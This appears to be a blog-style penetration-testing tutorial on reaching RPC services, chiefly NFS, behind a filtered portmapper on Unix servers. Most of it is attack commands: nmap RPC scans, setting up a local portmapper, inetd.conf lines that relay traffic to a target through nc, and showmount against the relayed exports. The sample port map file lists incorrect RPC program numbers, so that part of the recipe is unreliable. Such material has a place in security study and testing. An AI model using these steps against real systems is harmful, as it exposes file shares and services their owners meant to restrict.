Main Content

Heya - HollyGraceful here, I make all of this content in my spare time, like it? Please support me :)
You can donate via Bitcoin or Patreon!

Bypass RPC Portmapper Filtering

Portmapper is a registry of Remote Procedure Call services including RPC Services number, version number, TCP/UDP port and protocol. It generally runs on port 111 TCP/UDP.

When a client wishes to connect to a service they first connect to the Portmapper, an administrator may filter this port beliving that it will prevent an attacker connecting to services offered, however this is not the case as an attacker may replicate the portmapper locally and proxy requests to the target machine.

Impact: Attacker may be able to connect to vulnerable services offered by filtered Portmapper.

Affected: Unix Servers

Exploitation:

First of all determine the offered RPC Services using Nmap, by:

nmap -sR 10.0.0.1 -p 111-5000 20000-50000
nmap -sUR 10.0.0.1 -p 111-5000 20000-50000

Create a portmapper file containing the information discovered by nmap, as:

10000 2 tcp 111 portmapper
10000 2 udp 111 portmapper
10003 2 tcp 2049 nfs
10003 3 tcp 2049 nfs
10003 4 tcp 2049 nfs
10003 2 udp 2049 nfs
10003 3 udp 2049 nfs
10003 4 udp 2049 nfs

Create a local portmapper and supply the port map file to the mapper, like:

# portmap
# pmap_set < rpc_file_data

test the setup by running rpcinfo against YOUR machine

# rpcinfo -p 127.0.0.1

Now it is time to setup the attacking machine to redirect to the target

store the mappings in a tab separated inetd file, inetd.conf, as:

2049 stream tcp nowait root /usr/sbin/tcpd /bin/nc 10.0.0.1 2049
2049 dgram udp wait root /usr/sbin/tcpd /bin/nc -u 10.0.0.1 2049
# killall inetd
# inetd ./inetd.conf

now services requested on the local machine will use the local portmapper but be proxy-redirected to the target server! So you can use client software such as in the following example:

 # showmount -e 127.0.0.1

example output:

Export list for 127.0.0.1:
 / (everyone)

This output is not for 127.0.0.1 but the target server!